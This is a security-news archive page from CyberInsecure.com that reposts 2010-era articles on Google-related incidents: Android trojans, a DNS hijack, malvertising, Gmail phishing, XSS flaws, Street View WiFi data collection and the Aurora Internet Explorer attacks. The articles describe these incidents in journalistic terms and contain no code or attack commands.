CyberInsecure.com

Archive for the ‘Google’ Category

Chinese hackers are distributing a mobile trojan to users as a repackaged version of the Android Market security update released by Google last week.

Repackaging legit Android apps with trojans is becoming a common propagation method for mobile malware targeting Google’s operating system. The trend began in Russia, where the motivation behind the malicious programs was to steal credit by silently sending text messages to premium rate numbers.

Then it moved to China where more sophisticated Android malware variants were caught performing click fraud or displaying botnet-like capabilities. The problem reached a global audience when over 50 apps were rigged with a trojan and published on the Android Market under different names.

Google took them down last week shortly after being notified and used the remote uninstall feature to remove the trojan from infected devices. However, the malware also used a public exploit to root the device before installing itself, so the company also pushed an over-the-air update called “Android Market Security Tool” to undo it.

Security researchers from F-Secure and Symantec now warn that Chinese hackers have ironically repackaged this security tool with a new trojan dubbed Android.Bgserv.

Like most Android malware, Bgserv sends device identification codes (IMEI) to a remote server and can receive commands. According to Symantec, it can be ordered to send SMS messages to a number specified by attackers which means it can theoretically be used to steal credit.

“Analysis of the application is still ongoing, however, what is shocking is that the threat’s code seems to be based on a project hosted on Google Code and licensed under the Apache License,” the Symantec experts write.

The trojanized app is distributed from unregulated market places, which are common in China where there is no official Android Market. “This malware appears to be specific to a mainland Chinese network, as it contacts the number 10086 (related to China Mobile Net) and uses the new APN with the name ‘cmnet’ inserted in the APN list,” note security researchers from F-Secure.

Credit: Softpedia.com News

A hacker managed to hijack the DNS for google.com.bd and redirect the domain’s traffic to a website under their control for a limited period of time on Saturday. Many Bangladeshi Internet users reported being taken to a page saying that Google Bangladesh was “OwN3D by TiGER-M@TE.”

According to TechCrunch, Google confirmed the incident, but claimed the problem occurred at the Bangladesh Telecommunications Company which administers the .bd domain zone. TechIt reports the hijacking occurring only for google.com.bd, with www.google.com.bd continuing to display Google’s real website. Under normal circumstances, requests made to google.com.bd are automatically redirected to www.google.com.bd. It looks like someone intervened in that process.

No details are available about the method used to alter or poison the DNS entries for Google’s domain, but according to Web defacement archive Zone-H, TiGER-M@TE is responsible for attacks against many Bangladeshi websites.

These include www.waridtel.com.bd and www.bd.airtel.com, which belong to the Airtel telecommunications provider, as well as americanexpress.com.bd, the local branch of American Express.

DNS or domain hijacking incidents are not uncommon. In fact, their number appears to have increased during the past two years, especially for those involving high profile websites. Last month fraudsters hijacked the domain name of ChronoPay, the largest online payment processor in Russia and used the opportunity to phish credit card information.

In November, hackers managed to alter the DNS records for secunia.com, the domain name of one of the world’s leading vulnerability research firms. Other companies affected by similar attacks include Tata Consultancy Services (TCS), the largest IT and outsourcing provider in India, Baidu, the largest search engine in China, Twitter and Comcast, the largest US ISP.

The methods used to carry out these hijackings vary, but usually attackers rely on social engineering to trick employees at domain registrars to hand over control of the domains by posing as the real owners.

Credit: Softpedia.com News

Malware distributors have managed to trick two large ad networks into delivering malvertizements that silently infected the visitors of large websites with fake scareware programs.

The attacks started on December 3 and were picked up by a cloud-based malware scanning service called HackAlert and operated by Santa Clara-based security vendor Armorize Technologies.

HackAlert is used by VeriSign Trust Services, now a division of Symantec, for its daily VeriSign Trust Seal malware scans. So when several high profile websites started being tagged as infected, Armorize was asked to check its platform for possible bugs. However, their investigation revealed that sites like realestate.msn.com, msnbc.com, scout.com or mail.live.com, were indeed inadvertently infecting their visitors with malware.

It appears that cyber criminals registered a domain called adshufffle.com (three “f”-s) and posed as a legit advertising company named AdShuffle. They somehow managed to get their domain accepted on both the Google-owned DoubleClick network and rad.msn.com, the server used by Microsoft to deliver ads of various sites, including Hotmail and MSN.

The rogue ads served from this domain were not regular scareware malvertizements (malicious advertisements) that falsely claim visitors are infected and offer them a program to fix it. They looked harmless, but loaded the Eleonore drive-by download toolkit in the background. This toolkit silently exploits vulnerabilities in outdated versions of popular applications like Java, Adobe Reader, Internet Explorer and even Windows.

“Users visit websites that incorporate banner ads from DoubleClick or rad.msn.com, the malicious javascript is served from ADShufffle.com (notice the three f’s), starts a drive-by download process and if successful, HDD Plus and other malware are installed into the victim’s machine, without having the need to trick the victim into doing anything or clicking on anything. Simply visiting the page infects the visitors,” notes Wayne Huang, chief technology officer at Armorize and member of the team who researched the attack.

HDD Plus is one of the recent pieces of scareware that pose as hard disk defragmentation utilities. The other malware downloaded by the malvertizements was a trojan downloader.

Credit: Softpedia.com News

Security researchers from Sunbelt warn of a new wave of spam emails, which masquerades as official communications from Google in an attempt to steal login credentials from Gmail users.

The fake emails are well formulated and display visual elements associated with Web search giant, such as the Google accounts logo or the copyright notice.

The messages purport to originate from the Google Team and read as follows:

“Hello,

Your Google account information is incomplete, We recommend that you update your Google account for security reasons.

Download and open the attachment in this mail and follow the direction to update your Google account.”

The attached file is an HTML document called Gmail_access.html. Opening it in any browser will display a fake page almost identical to the one used to sign into Gmail.

In fact the images and other elements present on the rogue page are actually loaded from Google’s real website. “If you check the attachment source code you can see that it sucks genuine Gmail page elements,” Tom Kelchner, writes on the Sunbelt blog.

The fake sign in form sends inputted data to a ServiceLoginAuth.php script hosted on an external domain, which stores it for the attackers. “The information entered on the bogus page is snatched by a site registered to someone in Sremska Kamenica, Serbia,” Kelchner explains.

However, this seems to be a legit website that has been compromised, as it runs an outdated and probably vulnerable version of the e107 content management system. This campaign appears to have started sometime at the beginning of this month as there are reports about it on the official Gmail help forum dating back to September 1.

Fortunately, there’s a simple way for users to always check if they are on the real Gmail login page or not, since the website comes with SSL enabled by default.

Credit: Softpedia.com News

Hackers and pranksters began exploiting a newly discovered scripting flaw on YouTube on Sunday, provoking rumours that a virus was spreading on the site.

The cross-site scripting flaw (XSS) on the video-sharing website created a means for hackers to post JavaScript code in the comments sections of videos. The flaw meant that this JavaScript code was run on the machines of surfers viewing the same video clip.

Predictable enough, pranksters at 4Chan have begun using the vulnerability to redirect surfers looking for Justin Bieber video clips to goatse or false reports that the irksomely clean-cut Canadian singer had died in a car crash. Denizens of 4Chan are separately trying to rig an online poll to encourage Beiber to play North Korea in an upcoming tour.

In other cases the flaw has become the fodder of comment spam. Google iced the problem hours after it first appeared, techie-buzz.com reports.

“We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago,” said Google. “Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.”

The appearance of the vulnerability sparked rumours on Twitter and elsewhere that a virus was spreading across YouTube. A blog post by Chris Boyd of Sunbelt charts the genesis of this rumour, which is just the sort of thing that’s likely be used in new anti-virus (scareware) scams.

Security watchers at the Internet Storm Centre note that the vulnerability on YouTube might potentially have been used for all manner of hacking attacks, including password stealing scams.

“They [hackers] could steal your YouTube cookies, which probably doesn’t mean much to them, but they could also post various JavaScript code that will execute in your browser, in the context of YouTube,” an ISC handler writes. “I’ve seen nasty XSS attacks that are used to fake whole login screens and we know how many people use [the] same passwords for multiple accounts.”

Credit: The Register

Google has said that its world-roving Street View cars have been collecting information sent over open WiFi networks, contradicting previous assurances by the company. This means that Google may have collected emails and other private information if they traveled over WiFi networks while one of the cars was in range. Previously, the company said no payload data was ever intercepted.

In a blog post published on Friday afternoon, the company said that it collected the data by “mistake” and that the data has not been used in any Google products. Street View cars have now been grounded, according to the post, and the company has promised to delete the data. But before doing so, it will be asking regulators in “the relevant countries” how this should be done.

It arrives less than three weeks after the company said that such data was not being collected. But since then, Google conducted a review of the data being collected by its Street View cars after the data protection authority (DPA) in Hamburg, Germany requested such an audit.

Ginger McCall, a staff counsel with the Electronic Privacy Information Center (EPIC), a public watchdog, calls the data collection a “violation of customers’ trust,” and she questions Google’s claim that it was collecting the data by mistake. “People need to ask why was Google was collecting this information,” McCall told The Reg. “It’s difficult to believe that this would be done accidentally.

“This really flies in the face of their assertion that customers should just trust them.”

On April 27, in response to a complaint from the German DPA, a Google blog post said that in scanning open WiFi networks its Street View cars were collecting only the SSIDs that identify the networks and MAC addresses that identify particular network hardware, including routers. Google uses this data in products that rely on location data, such as Google Maps.

But the company now says that when Street View cars began collecting this data, it accidentally included some additional code with the cars’ software. “So how did this happen? Quite simply, it was a mistake,” today’s blog post reads. “In 2006, an engineer working on an experimental WiFi project wrote a piece of code that sampled all categories of publicly broadcast WiFi data.

“A year later, when our mobile team started a project to collect basic WiFi network data like SSID information and MAC addresses using Google’s Street View cars, they included that code in their software — although the project leaders did not want, and had no intention of using, payload data.”

As EPIC’s McCall says that Google’s admission undermines trust in the company, Google seems to acknowledges as much. “Maintaining people’s trust is crucial to everything we do, and in this case we fell short,” the company says.

In response, the company says it will ask a third party to review the its WiFi data collection software and to confirm that it deleted the data appropriately. It also says it will review its “procedures to ensure that our controls are sufficiently robust to address these kinds of problems in the future.”

Separately, the company will soon offer SSL encryption for its core search service. In July 2008, Google added an HTTPS-only option to its Gmail email service, and in mid-January, just after announcing that alleged Chinese had nabbed intellectual property from its internal systems, it turned on SSL by default.

It also offers SSL as an option with its Calendar, Docs, and Sites services, and just recently, it began doing the same with Google Web History and Google Bookmarks, after a security vulnerability was found in the search personalization service that taps Web History.

Google says that following today’s admission, its Street View cars will stop collecting WiFi data entirely, including SSIDs and MAC addresses. But presumably, they will not stop collecting photos of every street on the planet and posting them online.

Credit: The Register

Miscreants have created a Trojan that poses as a Google Chrome extension. Spammed messages attempt to dupe prospective marks into trying an add-on that “helps you better organize your documents received in your email”.

Interested parties are pointed towards a counterfeit Google Chrome Extensions page, which offers a malware executable. More observant punters will notice that the download is offered in an .exe file and not a .crx Google Chrome extension. Such markers are easily missed, however.

The Trojan horse malware on offer (identified by Romanian security firm BitDefender as the Agent-20577) blocks access to Google and Yahoo webpages. Attempts to reach these sites on infected machines are hijacked and redirected to counterfeit sites. Such trickery is commonly a prelude to either phishing attacks or a technique by the hackers behind the trick to gain affiliate income from scareware slingers or other undesirables.

The appearance of the attack shows that cybercrooks have begun targeting Google Chrome users, something that only tends to happen when a product or service becomes widely used among end users and is therefore a compliment (of sorts) to the success of Google’s browser technology.

Credit: The Register

A recently launched anonymization service suffered a setback last week when Gandi.net, a France-based registrar that bills itself as a “no bullshit company,” revoked its secure sockets layer certificate without warning.

Last week’s move against GoogleSharing caused its 30,000 users to instantly lose service, according to Moxie Marlinspike, the hacker who announced the anonymization proxy in mid January. It took him four days to get the site operational again, and by then, the vast majority of those users had stopped using the service.

In an email sent more than 24 hours later, a member of Gandi.net’s abuse department said the certificate was revoked “due to multiple and deliberate serious breaches” of the registrar’s terms of service. Specifically, the violations were incorrect information provided to Gandi.net’s Whois database, a trademark violation for the unauthorized use of “google” in the domain name and the use of the certificate for unspecified “fraudulent activities.”

GoogleSharing prevents Google from tracking searches and websites visited by specific individuals by mixing together requests from many different users so it’s impossible to tell where the queries originate. A Firefox plugin redirects Google-bound traffic to a proxy, where requests are stripped of all identifying information and replaced with the details of a different GoogleSharing user. The Google response is them proxied back to the originating user.

“GoogleSharing thrives by being totally transparent to the end user,” Marlinspike wrote in an email. “They install the addon and never have to think about it again. They don’t have to do anything special or visit any special websites. By causing a four day interruption, they’ve likely killed the majority of our user base.”

The hacker said it was true that some of information contained in the Whois database was not correct, but he insisted the service doesn’t engage in fraud and that the the inclusion of “google” in his domain name is protected by the fair use doctrine.

The revocation meant in an instant people who relied on GoogleSharing to anonymize Google search requests were unable to use the service. Because the service relies on a Firefox add-on that uses an authenticated page, their connections were killed with little explanation and no recourse.

The episode demonstrates the hazards of relying on internet companies that enforce terms of service reserving the right to play judge, jury and executioner with their customers’ websites. Gandi.net took the action with no warning and didn’t provide an explanation for more than a day. And even then, it failed to say exactly what “fraudulent activities” GoogleSharing had carried out.

So much for Gandi.net’s claims of being a “no bullshit company.”

“It’s a big claim to make,” the company’s marketing monkeys write. Among other things, it means employees “are honest about what we do; we will be straightforward in how we deal with you” and “if we’re ever hypocritical we will hold our hands up and clean up.”

Conspiracy-minded observers might be tempted to point out that over the past decade Marlinspike has regularly been a thorn in the side of companies who make big bucks issuing the certificates used to authenticate banks, online retailers, and other groups with sensitive websites. By demonstrating practical attacks that allow hackers to spoof the widely used credentials, his research calls into question the effectiveness of SSL certificates and the companies that issue and use them.

Already, eBay-owned PayPal has retaliated against the independent researcher for showing how the criminals could impersonate the online payments processor. Now, Gandi.net has followed a similar course.

But the consequences of the revocation are far from over. Whereas the service pushed an average of 4Mbps before, it was generating only about 300kbps after it came back online.

Which seems to suggest that if you’re doing anything considered remotely controversial on the net, you’re better off relying on yourself for payment and certificate services. The internet isn’t a democracy, and companies with self-serving terms of service can’t be counted on to deliver due process. Not even those that bill themselves as “no bullshit.”

Credit: The Register

Already besieged by complaints of shoddy user privacy, Google Buzz is susceptible to exploits that allow an attacker to commandeer accounts and even learn where victims are located, a security researcher said Tuesday.

The XSS, or cross-site scripting, vulnerability is unusual because it affects google.com, the domain that sets authentication cookies for a variety of popular Google services, including Mail, Calendar and Documents. That means an attacker might be able to hijack victims’ account simply by tricking them into visiting a booby-trapped link.

What’s more, the vulnerability ties into to the much-vaunted Google Location Services, making it possible for the attacker to learn the geographical location of users who have already opted in.

“It’s a pretty nasty vulnerability, actually,” Robert “RSnake” Hansen, CEO of secTheory.com, said. “If you’ve already agreed to that before being exploited, which most people will do, then the attacker also gets to know your location.”

The vulnerability is the result of web applications that fail to adequately scrutinize user input for malicious commands that inject unauthorized content and javascript into browsers visiting google.com addresses. The vulnerability, which Hansen said was reported by a hacker known as TrainReq, is also notable because it works over the SSL, or secure sockets layer, protocol.

The resulting “https” and “google.com” included in the address is likely to lead some victims into believing the address is safe, he said.

Over the years, Google engineers have done a good job at fortifying the site against XSS flaws. In the rare instances the bugs get through, Google personnel are usually quick at stamping them out once they’ve been reported.

Credit: The Register

Microsoft published an advisory today about a critical security vulnerability in all versions of Internet Explorer (apart from version 5). While all versions of Internet Explorer are affected, the risk for everyone running Internet Explorer 8 is lower since it has DEP (Data Execution Prevention) enabled by default.

According to McAfee, hackers who breached the defenses of Google, Adobe Systems and at least 32 other companies used this vulnerability to carry out at least some of the attacks.

The previously unknown flaw in the IE browser was probably just one of the vectors used in the attacks, McAfee CTO George Kurtz wrote in a blog post. Using a sophisticated spear-phishing campaign, the perpetrators included malicious links exploiting the bug in emails and instant messages sent to employees from at least three of the targeted companies.

Contrary to previous speculation, there was no evidence vulnerabilities in Adobe’s Reader or Acrobat applications were used in any of the attacks, Kurtz said. In its own statement, adobe concurred, saying researchers “have not been able to obtain any evidence to indicate that Adobe Reader or other Adobe technologies were used as the attack vector in this incident.”

Kurtz said his findings were based on malware samples taken from “three to five” of the targeted companies and he stressed that other zero days or exploits could have been used against other victims.

“In our investigation we discovered that one of the malware samples involved in this broad attack exploits a new, not publicly known vulnerability in Microsoft Internet Explorer,” Kurtz wrote. “Our investigation has shown that Internet explorer is vulnerable on all of Microsoft’s most recent operating system releases, including Windows 7.”

Shortly after the report, Microsoft confirmed the new IE vulnerability was “one of the vectors used in targeted and sophisticated attacks against Google and possibly other corporate networks.” A company statement said the attacks were carried out against version 6 of the widely used browser and suggested users protect themselves by enabling security features that have been added to successor versions.

McAfee’s report is the latest to shed light on one of the most significant cyberattacks in years. Google first disclosed the “highly sophisticated and targeted attack” on Tuesday, saying it originated in China and targeted its intellectual property. It added that 20 other companies suffered similar assaults, a number that independent researchers soon raised to 34. So far, only Google and Adobe have been identified as victims.

Yahoo, Symantec, Northrop Grumman and Dow Chemical have also been penetrated according to The Washington Post, citing unnamed “congressional and industry sources.”

The malware that McAfee researchers analyzed was sent to a highly select group of employees of a handful of companies that Kurtz declined to identify.

“This wasn’t something that got blasted to 300,000 people in a corporation,” Kurtz said in an interview with The Register. “It was really targeted at senior technology leaders that had access to core pieces of intellectual property, source code, et cetera.”

Kurtz has dubbed the attack “Aurora,” a reference to the filepath on the attacker’s machine that showed up in some of the malware code McAfee researchers analyzed. They believe that is the name the attackers gave to the operation. There was nothing in the binaries that indicated either way whether the code writers spoke Cantonese or Mandarin or were located in China.

The IE vulnerability stems from an invalid pointer reference that when exploited allows an attacker to execute malicious shell code on underlying machines. The malware caused exploited machines to download further malicious scripts that installed a backdoor. The machines then connected to command and control channels that were hosted on servers that resided in the US and Taiwan.

A security feature known as data execution prevention, which prevents data loaded into memory from being executed, will block the particular exploits McAfee has observed. But Kurtz warned the vulnerability exists in all versions of IE except for IE 5.01, service pack 4, and that it would be possible for attackers to work around the protection.

In an advisory, Microsoft recommended people use DEP, which by default is enabled in IE 8 but must be turned on in prior versions. The statement also advised users on Vista and later versions of Windows to run IE in protected mode. The advisory didn’t say when an update would be released that patches the vulnerability.

Credit: The Register, SANS ISC